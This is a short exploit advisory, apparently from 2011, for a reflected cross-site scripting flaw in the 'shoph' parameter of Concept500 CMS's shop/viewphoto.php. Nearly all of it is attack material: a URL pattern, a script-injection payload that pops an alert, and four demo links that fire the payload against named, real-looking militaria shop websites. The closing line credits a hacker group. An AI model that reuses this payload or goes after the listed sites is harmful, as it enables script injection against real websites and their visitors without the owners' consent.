# Exploit Title: Concept500 CMS XSS Vulnerability
# Date: 2011-08-11
# Author: Sepehr Security Team
# Software Site:  http://www.concept500.co.uk/
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
#Exploit:
     http://<=- Domain -=>/shop/viewphoto.php?shoph=id[XSS]&phqu=id  
#XSS:
     "> <script>alert(String.fromCharCode(88, 83, 83))</script>
  
#Demo:
    http://www.clementsmilitaria.com/shop/viewphoto.php?shoph=50293"><script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=4

    http://www.dbmilitaria.co.uk/shop/viewphoto.php?shoph=10242"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=2

    http://www.dhbmilitaria.com/shop/viewphoto.php?shoph=50084"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=0

    http://www.dorsetmilitaria.com/shop/viewphoto.php?shoph=50680"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=5

~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
#Spc Tanx to All Sepehr Sceurity Team Members And All Iranian Hack3rs
#wWw.Sepehr-Team.orG